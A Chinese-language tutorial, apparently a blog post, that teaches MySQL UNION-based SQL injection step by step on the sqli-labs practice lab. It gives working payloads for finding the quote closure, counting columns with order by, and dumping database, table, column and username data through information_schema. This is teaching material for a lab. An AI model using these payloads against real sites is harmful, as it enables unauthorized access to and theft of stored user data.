sql注入mysql的union联合注入

关于闭合符号怎么判断

可以使用来探测闭合，报错信息中后的符号即为闭合符号

用sqli第一关举例我们可以看到后是’，所以可以判断本关的闭合是’

union联合注入

（union注入条件：union用于合并多个select语句的结果，所有他呀求内部的select语句要拥有相同数量的列，列也要是相似的数据类型）

id=1’如果报错，那么就存在注入点，可以在使用id=1' and 1=1#和id=1' and 1=2#判断，如果注入存在，那么id=1' and 1=2#会报错（有闭合说明是字符型，数字型就没得闭合了，并且输入数据错误，比如id=1-，如果后面没有闭合符，sql会自动矫正）

id=1' and 1=1--+执行

id=1' and 1=2--+报错

判断存在注入后，开始判断有多少表，使用order by判断（也可以使用group by，方法是一样的）

使用id=1' order by 10--+，他告诉我们没有那么多，我们可以试试折半去找

使用id=1' order by 5--+

也没有5个那么多，那我们试试3，使用id=1' order by 3--+

显示出来了，为了避免漏下，我们试试4，结果报错了，说明只有三个表

判断完有几个表，那我们就要看看这个字段的显示位置在哪了，我们可以给id一个不存在的值，比如-1、a、9999999等

这里采用union注入 id=-1'union select 1,2,3--+,1，2，3为刚才探测到的字段 ，可以看到字段二在login name后，字段3在password后

然后就可以查看他都有什么数据库了id=-1'union select 1,2,group_concat(schema_name) from information_schema.schemata--+

翻译一下group_concat(schema_name) from information_schema.schemata--+

group_concat()：是将查询到的结果合并，结果和结果之间用逗号隔开 。

information_schema：是mysql自带的一个信息数据库包含了mysql维护的其他数据库的信息

schemata：是information_schema库下的一个表，存放了当前数据库下的所有数据库，效果等同于showdatabase

schema_name：schemata表中的列，包含了当前数据库管理系统中所有的数据库名

直译过来大概就是打印information_schema库中schemata表schema_name列

information_schema数据库只存在于MySQL5.0之后，5.0之前只能使用access字典暴力破解的方式

在information_schema数据库中还可以利用的表：

schema_name　   　储存了所有数据库的库名
table_schema　     储存了数据库名
tables　            储存了数据库库名，以及该库中包含的表名，
table_schema        储存了数据库名
table_name　　     储存了表名

具体可参考：博客     官方文档

我们还可以在这查询数据库的一些信息，比如查询我们当前的数据库以及版本信息id=-1' union select 1,database(),version()--+，我们可以看到当前的数据库是security，mysql版本为5.7.26

version()：查看数据库版本

database()：查看使用的数据库

user()：查看当前用户

limit：limit子句分批来获取所有数据

group_concat()：一次性获取所有的数据库信息

我们知道了数据库，然后开始查看表名id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

翻译一下id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+，大部分语句在前面已经翻译过，从information_schema数据库中的tables表中执行database()

然后我们要获取表中的所有的字段，这边选择获取users表中的字段，因为users表中存储的是用户数据id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users') --+

最后，获取字段中的所有数据id=0' union select 1,2,(select group_concat(username) from security.users) --+